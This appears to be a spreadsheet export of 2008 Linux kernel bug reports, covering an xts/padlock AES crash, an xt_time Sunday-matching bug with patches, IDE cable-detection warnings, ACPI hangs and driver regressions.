1500MHz CentaurHauls GNU/Linux Gnu C 4.2.3 Gnu make 3.81 binutils 2.18 util-linux 2.13.0.1 mount 2.13.0.1 module-init-tools 3.2.2 e2fsprogs 1.40.4 jfsutils 1.1.12 reiserfsprogs 3.6.20 xfsprogs 2.9.4 pcmciautils 014 PPP version Linux C Library 2.7 Dynamic linker (ldd) 2.7 Linux C++ Library so.6.0 Procps 3.2.7 Net-tools 1.60 Kbd 1.13 Sh-utils 6.10 udev 116 wireless-tools 29 Modules Loaded xts usb_storage lrw ip6table_filter sit tunnel4 cls_fw sch_hfsc iptable_raw xt_comment xt_policy ipt_ULOG ipt_TTL ipt_ttl ipt_TOS ipt_tos ipt_SAME ipt_REJECT ipt_REDIRECT ipt_recent ipt_owner ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_iprange ipt_ECN ipt_ecn ipt_CLUSTERIP ipt_ah ipt_addrtype nf_nat_tftp nf_nat_snmp_basic nf_nat_sip nf_nat_pptp nf_nat_proto_gre nf_nat_irc nf_nat_h323 nf_nat_ftp nf_nat_amanda ts_kmp nf_conntrack_amanda nf_conntrack_tftp nf_conntrack_sip nf_conntrack_proto_sctp nf_conntrack_pptp nf_conntrack_proto_gre nf_conntrack_netlink nf_conntrack_netbios_ns nf_conntrack_irc nf_conntrack_h323 ipv6 nf_conntrack_ftp xt_tcpmss xt_pkttype xt_physdev xt_NFQUEUE xt_NFLOG xt_multiport xt_MARK xt_mark xt_mac xt_limit xt_length xt_helper xt_hashlimit ip6_tables xt_dccp xt_conntrack xt_CONNMARK xt_connmark xt_CLASSIFY xt_tcpudp xt_state iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_mangle nfnetlink iptable_filter ip_tables x_tables w83781d hwmon_vid ppdev lp parport_pc parport ppp_generic rtc_cmos psmouse serio_raw i2c_viapro i2c_core ohci1394 ieee1394 via_agp agpgart evdev thermal processor fan button snd_via82xx snd_ac97_codec snd_mpu401_uart snd_rawmidi snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_pcm snd_timer snd_page_alloc snd_mixer_oss snd soundcore ac97_bus slhc bridge llc tun pata_acpi sata_sil24 pdc202xx_old sata_via pata_via Problem Description: I wanted to set up an encrypted partition with xts on an via C7 (padlock enabled). As a result I got (tried it 3 times): Mar 5 17:40:29 servi general protection fault: 0000 [#3] Mar 5 17:40:29 servi Modules linked in: xts usb_storage lrw ip6table_filter sit tunnel4 cls_fw sch_hfsc iptable_raw xt_comment xt_policy ipt_ULOG ipt_TTL ipt_ttl ipt_TOS ipt_tos ipt_SAME ipt_REJECT ipt_REDIRECT ipt_recent ipt_owner ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_iprange ipt_ECN ipt_ecn ipt_CLUSTERIP ipt_ah ipt_addrtype nf_nat_tftp nf_nat_snmp_basic nf_nat_sip nf_nat_pptp nf_nat_proto_gre nf_nat_irc nf_nat_h323 nf_nat_ftp nf_nat_amanda ts_kmp nf_conntrack_amanda nf_conntrack_tftp nf_conntrack_sip nf_conntrack_proto_sctp nf_conntrack_pptp nf_conntrack_proto_gre nf_conntrack_netlink nf_conntrack_netbios_ns nf_conntrack_irc nf_conntrack_h323 ipv6 nf_conntrack_ftp xt_tcpmss xt_pkttype xt_physdev xt_NFQUEUE xt_NFLOG xt_multiport xt_MARK xt_mark xt_mac xt_limit xt_length xt_helper xt_hashlimit ip6_tables xt_dccp xt_conntrack xt_CONNMARK xt_connmark xt_CLASSIFY xt_tcpudp xt_state iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_mangle nfnetlink iptable_filter ip_tables x_tables w83781d hwmon_vid ppdev lp parport_pc parport ppp_generic rtc_cmos psmouse serio_raw i2c_viapro i2c_core ohci1394 ieee1394 via_agp agpgart evdev thermal processor fan button snd_via82xx snd_ac97_codec snd_mpu401_uart snd_rawmidi snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_pcm snd_timer snd_page_alloc snd_mixer_oss snd soundcore ac97_bus slhc bridge llc tun pata_acpi sata_sil24 pdc202xx_old sata_via pata_via Mar 5 17:40:29 servi Mar 5 17:40:29 servi Pid: 18062, comm: kcryptd Tainted: G D (2.6.24.2 #2) Mar 5 17:40:29 servi EIP: 0060:[&lt;c03642d1&gt;] EFLAGS: 00010202 CPU: 0 Mar 5 17:40:29 servi EIP is at aes_encrypt+0x31/0x60 Mar 5 17:40:29 servi EAX: d8e51180 EBX: f3c0d850 ECX: 00000001 EDX: f3c0d820 Mar 5 17:40:29 servi ESI: d8e51e70 EDI: d8e51de8 EBP: d8e51de8 ESP: d8e51dc4 Mar 5 17:40:29 servi DS: 007b ES: 007b FS: 0000 GS: 0000 SS: 0068 Mar 5 17:40:29 servi Process kcryptd (pid: 18062, ti=d8e50000 task=f3e6faa0 task.ti=d8e50000) Mar 5 17:40:29 servi Stack: c7902b60 dffda000 dffda000 00000200 f8fb90a3 c7902b60 d8e51e1c d8e51e94 Mar 5 17:40:29 servi 00000010 00000000 00000000 00000000 00000000 dfd51c00 c0363b90 c7902b60 Mar 5 17:40:29 servi 00000000 00000000 d8e51eac f8fb9222 c03642a0 c0363b90 c13ffb40 dffda000 Mar 5 17:40:29 servi Call Trace: Mar 5 17:40:29 servi [&lt;f8fb90a3&gt;] crypt+0x83/0x110 [xts] Mar 5 17:40:29 servi [&lt;c0363b90&gt;] aes_decrypt+0x0/0x60 Mar 5 17:40:29 servi [&lt;f8fb9222&gt;] decrypt+0x42/0x50 [xts] Mar 5 17:40:29 servi [&lt;c03642a0&gt;] aes_encrypt+0x0/0x60 Mar 5 17:40:29 servi [&lt;c0363b90&gt;] aes_decrypt+0x0/0x60 Mar 5 17:40:29 servi [&lt;c035ed7d&gt;] crypt_convert_scatterlist+0x9d/0xe0 Mar 5 17:40:29 servi [&lt;c035ef65&gt;] crypt_convert+0x1a5/0x1d0 Mar 5 17:40:29 servi [&lt;c035efe5&gt;] kcryptd_do_crypt+0x55/0x290 Mar 5 17:40:29 servi [&lt;c01196b7&gt;] update_curr+0x87/0x110 Mar 5 17:40:29 servi [&lt;c035ef90&gt;] kcryptd_do_crypt+0x0/0x290 Mar 5 17:40:29 servi [&lt;c012d33c&gt;] run_workqueue+0x8c/0x110 Mar 5 17:40:29 servi [&lt;c03fe769&gt;] schedule+0x149/0x270 Mar 5 17:40:29 servi [&lt;c012db10&gt;] worker_thread+0x0/0xe0 Mar 5 17:40:29 servi [&lt;c012db8d&gt;] worker_thread+0x7d/0xe0 Mar 5 17:40:29 servi [&lt;c01309c0&gt;] autoremove_wake_function+0x0/0x40 Mar 5 17:40:29 servi [&lt;c012db10&gt;] worker_thread+0x0/0xe0 Mar 5 17:40:29 servi [&lt;c0130672&gt;] kthread+0x42/0x70 Mar 5 17:40:29 servi [&lt;c0130630&gt;] kthread+0x0/0x70 Mar 5 17:40:29 servi [&lt;c0104baf&gt;] kernel_thread_helper+0x7/0x18 Mar 5 17:40:29 servi ======================= Mar 5 17:40:29 servi Code: 0c 89 d7 8d 50 2f 83 e2 f0 89 5c 24 04 8d 5a 30 89 74 24 08 89 ce 9c 9d 89 c8 35 f0 0f 00 00 a9 ff 0f 00 00 74 19 b9 01 00 00 00 &lt;f3&gt; 0f a7 c8 8b 5c 24 04 8b 74 24 08 8b 7c 24 0c 83 c4 10 c3 89 Mar 5 17:40:29 servi EIP: [&lt;c03642d1&gt;] aes_encrypt+0x31/0x60 SS:ESP 0068:d8e51dc4 Mar 5 17:40:29 servi ---[ end trace bc57502807c3dc8f ]--- Mar 5 17:40:29 servi note: kcryptd[18062] exited with preempt_count 1 Steps to reproduce: just execute: cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdd2 on a via padlock enabled machine. This is my first bugreport, I hope I made everything right, but did not know what to put as alias. I hope this will help somebody to fix this issue.</t>
  </si>
  <si>
    <t>2.6.25-rc4 rcupreempt.h WARNINGs while suspend/resume</t>
  </si>
  <si>
    <t>2008-03-05 14:32 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:46 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc4 rcupreempt.h WARNINGs while suspend/resume Submitter : "Dave Young" &lt;hidave.darkstar@gmail.com&gt; Date : 2008-03-05 References : http://lkml.org/lkml/2008/3/5/49 Handled-By : "Paul E. McKenney" &lt;paulmck@linux.vnet.ibm.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pata_amd libata: Erroneous "limited to UDMA/33 due to 40-wire cable" from PX-130A</t>
  </si>
  <si>
    <t>2008-03-06 05:06 UTC</t>
  </si>
  <si>
    <t>Manfred</t>
  </si>
  <si>
    <t>2008-06-18 03:28 UTC</t>
  </si>
  <si>
    <t>xt_time_match() never matches on Sundays</t>
  </si>
  <si>
    <t>2008-03-06 09:26 UTC</t>
  </si>
  <si>
    <t>Andrew Schulman</t>
  </si>
  <si>
    <t>2008-03-17 08:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.24 Distribution: Debian Hardware Environment: amd64 Software Environment: Problem Description: xt_time_match() in net/netfilter/xt_time.c in kernel 2.6.24 never matches on Sundays. Steps to reproduce: (1) iptables -I OUTPUT -m time --weekday Sun -j REJECT (2) Send some traffic and check the match count for the rule. It will stay at zero, even on Sunday. Diagnosis: In net/netfilter/xt_time.c, the problem is in localtime_2(), which uses r-&gt;weekday = (4 + r-&gt;dse) % 7; to map the epoch day onto a weekday in {0,...,6}. In particular this gives 0 for Sundays. But 0 has to be wrong; a weekday of 0 can never match. xt_time_match() has if (!(info-&gt;weekdays_match &amp; (1 &lt;&lt; current_time.weekday))) return false; and when current_time.weekday = 0, the result of the &amp; is always zero, even when info-&gt;weekdays_match = XT_TIME_ALL_WEEKDAYS = 0xFE. The solution is to map Sunday onto 7, not 0. Either of the following patches does it; they're equivalent. The first is more compact, the second is probably clearer. With the patch (#1) installed, I've confirmed on my host that 'iptables -m time --weekdays Sun' matches again. &lt;patch #1&gt; diff -ur linux-source-2.6.24.orig/net/netfilter/xt_time.c linux-source-2.6.24/net/netfilter/xt_time.c --- linux-source-2.6.24.orig/net/netfilter/xt_time.c 2008-01-24 17:58:37.000000000 -0500 +++ linux-source-2.6.24/net/netfilter/xt_time.c 2008-03-05 20:01:37.000000000 -0500 @@ -96,7 +96,8 @@ r-&gt;dse = time / 86400; /* 1970-01-01 (w=0) was a Thursday (4). */ - r-&gt;weekday = (4 + r-&gt;dse) % 7; + /* -1 and +1 map Sunday onto 7, instead of 0. */ + r-&gt;weekday = (4 + r-&gt;dse - 1) % 7 + 1; } static void localtime_3(struct xtm *r, time_t time) &lt;/patch #1&gt; &lt;patch #2&gt; diff -ur linux-source-2.6.24.orig/net/netfilter/xt_time.c linux-source-2.6.24/net/netfilter/xt_time.c --- linux-source-2.6.24.orig/net/netfilter/xt_time.c 2008-01-24 17:58:37.000000000 -0500 +++ linux-source-2.6.24/net/netfilter/xt_time.c 2008-03-05 20:03:15.000000000 -0500 @@ -97,6 +97,9 @@ /* 1970-01-01 (w=0) was a Thursday (4). */ r-&gt;weekday = (4 + r-&gt;dse) % 7; + /* Map Sunday onto 7, not 0. */ + if (r-&gt;weekday == 0) + r-&gt;weekday = 7; } static void localtime_3(struct xtm *r, time_t time) &lt;/patch #2&gt;</t>
  </si>
  <si>
    <t>sch311x  watchdog timer support</t>
  </si>
  <si>
    <t>2008-03-06 13:35 UTC</t>
  </si>
  <si>
    <t>2008-10-22 01:10 UTC</t>
  </si>
  <si>
    <t>I'm not going to report a bug but simply suggesting adding support for the sch311x series Super-IO device (containing a watchdog timer). I recently bough a VIA EPIA SN board equipped with this chip, the hw monitoring support has been added in 2.6.24 and works fine, but a driver for the watchdog is still missing. Specifications should be available here: http://www.nuhorizons.com/FeaturedProducts/Volume1/SMSC/311x.pdf http://www.smsc.com/main/datasheets/311xdb.pdf If someone is interested in implementing such driver, just send me patches to try.</t>
  </si>
  <si>
    <t>Commit 9f10d9ee breaks CD mounting/burning</t>
  </si>
  <si>
    <t>commit 9f10d9ee0ac6d79d7bc8b9a158bf4a29322d84d3</t>
  </si>
  <si>
    <t>2008-03-06 14:59 UTC</t>
  </si>
  <si>
    <t>2008-03-09 16:52 UTC</t>
  </si>
  <si>
    <t>Submitter : walt &lt;w41ter@gmail.com&gt; Date : 2008-03-06 1:16 References : http://marc.info/?t=120476623500003&amp;r=1&amp;w=2 Handled-By : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=120483868101033&amp;w=2 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>SCSI_AIC94XX must depend on SCSI</t>
  </si>
  <si>
    <t>2.6.25-rc4-56-gd7fe321</t>
  </si>
  <si>
    <t>2008-03-06 15:08 UTC</t>
  </si>
  <si>
    <t>2008-03-28 15:56 UTC</t>
  </si>
  <si>
    <t>Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-03-06 19:09 References : http://marc.info/?l=linux-kernel&amp;m=120483073617232&amp;w=2 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=120483499725928&amp;w=2 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc4: crash on boot when SMP enabled</t>
  </si>
  <si>
    <t>2008-03-06 15:16 UTC</t>
  </si>
  <si>
    <t>2008-03-10 05:58 UTC</t>
  </si>
  <si>
    <t>Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2008-03-06 10:29 References : http://marc.info/?l=linux-kernel&amp;m=120480512530063&amp;w=2 Handled-By : "Yinghai Lu" &lt;yhlu.kernel@gmail.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>libata: allow LLDs w/o any reset method</t>
  </si>
  <si>
    <t>2.5.25-rc</t>
  </si>
  <si>
    <t>2008-03-06 15:21 UTC</t>
  </si>
  <si>
    <t>2008-03-10 18:59 UTC</t>
  </si>
  <si>
    <t>Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-03-06 10:25 References : http://marc.info/?l=linux-kernel&amp;m=120479928020617&amp;w=2 Handled-By : Tejun Heo &lt;htejun@gmail.com&gt; Patch : http://marc.info/?l=linux-ide&amp;m=120477660124629&amp;w=2 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Treason uncloaked spams syslog with latest git</t>
  </si>
  <si>
    <t>2.5.25-rc4-git1</t>
  </si>
  <si>
    <t>2008-03-06 15:46 UTC</t>
  </si>
  <si>
    <t>2008-03-13 16:51 UTC</t>
  </si>
  <si>
    <t>Submitter : Thomas Gleixner &lt;tglx@linutronix.de&gt; Date : 2008-03-06 05:47 References : http://www.ussg.iu.edu/hypermail/linux/kernel/0803.0/2444.html This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IDE: Erroneous "drive side 80-wire cable detection failed" for PX-130A</t>
  </si>
  <si>
    <t>2008-03-07 02:36 UTC</t>
  </si>
  <si>
    <t>2008-10-02 06:58 UTC</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #10179 +++ +++ +++ I would have preferred to assign this one to IDE directly; +++ unfortunately the bugzilla "*Componet" selection list +++ does not offer this choice. +++ +++ +++ +++ +++ +++ +++ +++ ++</t>
  </si>
  <si>
    <t>iTCO watchdog timer</t>
  </si>
  <si>
    <t>2.6.23.15-137.fc8</t>
  </si>
  <si>
    <t>2008-03-07 11:03 UTC</t>
  </si>
  <si>
    <t>2010-01-19 18:32 UTC</t>
  </si>
  <si>
    <t>On Tue, 04 Mar 2008 15:10:05 -0500 Stephen Clark &lt;Stephen.Clark@seclark.us&gt; wrote: &gt; Hello, &gt; &gt; I have new Intel DG33FB mainboard. &gt; &gt; &gt; Mar 2 20:47:19 joker1 kernel: iTCO_vendor_support: vendor-support=0 &gt; Mar 2 20:47:19 joker1 kernel: iTCO_wdt: Intel TCO WatchDog Timer Driver v1.02 (26-Jul-2007) &gt; Mar 2 20:47:19 joker1 kernel: iTCO_wdt: Found a ICH9DH TCO device (Version=2, TCOBASE=0x0460) &gt; Mar 2 20:47:19 joker1 kernel: iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0) &gt; ... &gt; Mar 4 14:22:59 joker1 kernel: iTCO_wdt: Unexpected close, not stopping watchdog! &gt; &gt; &gt; I start watchdog.c and then kill it expecting the system to reboot - but &gt; it doesn't. &gt; &gt; Isn't this how it is supposed to work? &gt; &gt; Linux version 2.6.23.15-137.fc8</t>
  </si>
  <si>
    <t>crypto/ section fixes</t>
  </si>
  <si>
    <t>2.6.25-rc4-git</t>
  </si>
  <si>
    <t>2008-03-08 14:00 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:26 UTC</t>
  </si>
  <si>
    <t>Subject : crypto/ section fixes Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/3/8/125 Caused-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt; commit 76fc60a2e3c6aa6e98cd3a5cb81a1855c637b274 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/3/8/125</t>
  </si>
  <si>
    <t>Yum update of Kernel broke sis900 ethernet driver</t>
  </si>
  <si>
    <t>2.6.24.3-12.fc8.i686</t>
  </si>
  <si>
    <t>2008-03-08 15:36 UTC</t>
  </si>
  <si>
    <t>Dan McNaul</t>
  </si>
  <si>
    <t>2008-12-31 00:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.15-137.fc8.i686 Earliest failing kernel version: 2.6.24.3-12.fc8.i686 Distribution: Fedora Core 8 Hardware Environment: PC Software Environment: Following YUM update Problem Description: After reboot following YUM update to new kernel - SiS 900 PCI Fast Ethernet (driver sis900) can not ifconfig eth0. Configuration fails with message "SIOCSIFFLAGS: Invalid argument". System does boot. SO To recover, insert FC8 DVD and copy original kernel RPM's to the hard drive. Then install the old Kernel with "rpm -ivh --force --hash *.rpm" and reboot. System comes up and configures the sis900 eth0 correctly at startup. Steps to reproduce: A machine with a SiS 900 PCI Fast Ethernet installed. INstall RC8 and apply the updates. After 2.6.24.3, reboot and notice the trouble. Dan</t>
  </si>
  <si>
    <t>M G Berberich</t>
  </si>
  <si>
    <t>[regression]2.6.25-rc4: boot panic on alpha</t>
  </si>
  <si>
    <t>2008-03-09 15:55 UTC</t>
  </si>
  <si>
    <t>2008-03-09 16:44 UTC</t>
  </si>
  <si>
    <t>Submitter : Bob Tracy &lt;rct@frus.com&gt; Date : 2008-03-07 04:41 References : http://lkml.org/lkml/2008/3/6/513 Handled-By : Ivan Kokshaysky &lt;ink@jurassic.park.msu.ru&gt; Patch : http://lkml.org/lkml/2008/3/7/221 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25 sysdev API problem</t>
  </si>
  <si>
    <t>2008-03-09 16:09 UTC</t>
  </si>
  <si>
    <t>2008-03-10 19:00 UTC</t>
  </si>
  <si>
    <t>Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-03-08 16:56 References : http://lkml.org/lkml/2008/3/8/59 Handled-By : Greg KH &lt;gregkh@suse.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc4-git3: Handling of audio CDs broken on pata_ali</t>
  </si>
  <si>
    <t>2.6.25-rc4-git3</t>
  </si>
  <si>
    <t>2008-03-09 16:14 UTC</t>
  </si>
  <si>
    <t>2008-03-17 12:39 UTC</t>
  </si>
  <si>
    <t>Date : 2008-03-08 22:46 References : http://lkml.org/lkml/2008/3/8/123 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drivers/media/video/cx2341x.c: undefined references</t>
  </si>
  <si>
    <t>2008-03-09 16:20 UTC</t>
  </si>
  <si>
    <t>2008-03-20 10:33 UTC</t>
  </si>
  <si>
    <t>Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-03-07 13:48 References : http://lkml.org/lkml/2008/3/7/168 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[patch] fix ACPI boot regression (was: Re: Linux 2.6.25-rc5)</t>
  </si>
  <si>
    <t>2.6.25-rc5</t>
  </si>
  <si>
    <t>2008-03-10 14:46 UTC</t>
  </si>
  <si>
    <t>2008-03-10 19:02 UTC</t>
  </si>
  <si>
    <t>Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-03-10 18:04 References : http://lkml.org/lkml/2008/3/10/171 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://lkml.org/lkml/2008/3/10/171 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel 2.6.24 acpi_ec_wait timeout if ac adapter is plugged in - Sony Vaio VGN-C2Z</t>
  </si>
  <si>
    <t>2008-03-11 06:09 UTC</t>
  </si>
  <si>
    <t>2008-10-17 14:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 Earliest failing kernel version: 2.6.24 Distribution: Arch current Hardware Environment: Sony Vaio VGN C2Z Software Environment: Problem Description: Since kernel 2.6.24 system locks on boot if ac adapter is plugged in. If no ac adapter is present system boots as usual. Using a kernel below 2.6.24, or booting with acpi=off fixes the problem. Uncompressing Linux... Ok, booting the kernel. ACPI: EC: acpi_ec_wait timeout, status = 0, expect_event = 1 ACPI: EC: read timeout, command = 128 Steps to reproduce: Boot a Sony Vaio VGN-C2Z with a kernel above 2.6.23 with plugged in ac adapter.</t>
  </si>
  <si>
    <t>kacpid and kacpi_notify takes 90 % of cpu</t>
  </si>
  <si>
    <t>2008-03-11 09:44 UTC</t>
  </si>
  <si>
    <t>Jithin Emmanuel</t>
  </si>
  <si>
    <t>2008-05-28 18:03 UTC</t>
  </si>
  <si>
    <t>runaway_kacpid</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.24 Earliest failing kernel version:2.6.22 Distribution:Ubuntu Hardware Environment:Pentium Core 2 Duo, Intel 945 GCNL mother board, Nvidia 8600 GT Software Environment:Gnome Problem Description:i dual boot with windows XP. If the system is shutdown for a few days and i start linux. There is no problem. But if i start windows and then linux. This kacpid &amp; kacpi_notify eats my cpu. My earlier system was Pentium iV + intel 865 GBF mother board. There was no such problems with that system. This problem appeared after i upgraded my hardware. Steps to reproduce:Use the hardware configuration listed and dual boot with windows.</t>
  </si>
  <si>
    <t>80-wire cable detection failed for SAMSUNG SP0822N</t>
  </si>
  <si>
    <t>2008-03-11 12:22 UTC</t>
  </si>
  <si>
    <t>Matthias B.</t>
  </si>
  <si>
    <t>2008-12-07 07:16 UTC</t>
  </si>
  <si>
    <t>Earliest failing kernel version:(tested with 2.6.24 and 2.6.25-rc4) Problem Description: hda: SAMSUNG SP0822N, ATA DISK drive hda: drive side 80-wire cable detection failed, limiting max speed to UDMA33 I've seen that there are already several reports about erroneous failures of the 80-wire cable detection, so I'm not sure if this one is useful, but the message ide_setup: ide0=ata66 -- OBSOLETE OPTION, WILL BE REMOVED SOON! scares me a bit. I don't want to end up having my hard disk reduced to half speed with no way to override it. Here's the data from my disk drive. /dev/hda: ATA device, with non-removable media Model Number: SAMSUNG SP0822N Serial Number: S06QJ10Y437166 Firmware Revision: WA100-10 Standards: Used: ATA/ATAPI-6 T13 1410D revision 1 Supported: 7 6 5 4 &amp; some of 7 Configuration: Logical max current cylinders 16383 4047 heads 16 16 sectors/track 63 255 -- CHS current addressable sectors: 16511760 LBA user addressable sectors: 156368016 LBA48 user addressable sectors: 156368016 device size with M = 1024*1024: 76351 MBytes device size with M = 1000*1000: 80060 MBytes (80 GB) Capabilities: LBA, IORDY(can be disabled) Standby timer values: spec'd by Standard, no device specific minimum R/W multiple sector transfer: Max = 16 Current = 16 Recommended acoustic management value: 254, current value: 0 DMA: mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 Cycle time: min=120ns recommended=120ns PIO: pio0 pio1 pio2 pio3 pio4 Cycle time: no flow control=120ns IORDY flow control=120ns Commands/features: Enabled Supported: SMART feature set Security Mode feature set * Power Management feature set * Write cache * Look-ahead * Host Protected Area feature set * WRITE_BUFFER command * READ_BUFFER command NOP cmd * DOWNLOAD_MICROCODE SET_MAX security extension Automatic Acoustic Management feature set * 48-bit Address feature set * Device Configuration Overlay feature set * Mandatory FLUSH_CACHE * SMART error logging * SMART self-test Security: Master password revision code = 65534 supported not enabled not locked not frozen not expired: security count supported: enhanced erase 50min for SECURITY ERASE UNIT. 50min for ENHANCED SECURITY ERASE UNIT. Checksum: correct /dev/hda: 045a 3fff c837 0010 7a8e 01f2 003f ffff 0000 0000 5330 3651 4a31 3059 3433 3731 3636 2020 2020 2020 0003 1000 0004 5741 3130 302d 3130 5341 4d53 554e 4720 5350 3038 3232 4e20 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 8010 0000 2f00 4000 0200 0200 0007 0fcf 0010 00ff f310 00fb 0110 fc90 0951 0000 0007 0003 0078 0078 0078 0078 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 00fe 001c 746b 5f01 4003 3468 1c01 4003 407f 0019 0019 0000 fffe 2008 fe00 0000 0000 0000 0000 0000 fc90 0951 0000 0000 0000 0000 0000 0000 50f0 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0021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bda5</t>
  </si>
  <si>
    <t>On H12Y based notebooks 8139too (mmio) or sdhci freeze the system</t>
  </si>
  <si>
    <t>3.4-rc6</t>
  </si>
  <si>
    <t>2008-03-12 06:17 UTC</t>
  </si>
  <si>
    <t>Arne Fitzenreiter</t>
  </si>
  <si>
    <t>2012-07-01 09:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu, Fedora, Knoppix (?all?) Hardware Environment: Averatec 2460 - Twinhead H12Y OEM Problem Description: The system freeze if i load "8139too" or "sdhci" kernel module. I have built a special version of "8139too" that use pio mode instead of mmio that works. lspci output: 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, fast devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) (prog-if 00 [VGA]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at ffe80000 (32-bit, non-prefetchable) [size=512K] I/O ports at ec00 [size=8] Memory at d0000000 (32-bit, prefetchable) [size=256M] Memory at ffe40000 (32-bit, non-prefetchable) [size=256K] Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [d0] Power Management version 2 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, fast devsel, latency 0 Memory at ffd80000 (32-bit, non-prefetchable) [size=512K] Capabilities: [d0] Power Management version 2 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at ffe38000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Capabilities: [70] Express Unknown type IRQ 0 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 Memory behind bridge: ff200000-ff2fffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [90] Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Capabilities: [a0] Power Management version 2 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000a000-0000afff Memory behind bridge: fef00000-ff1fffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [90] Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Capabilities: [a0] Power Management version 2 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 0, IRQ 18 I/O ports at e880 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: TWINHEAD 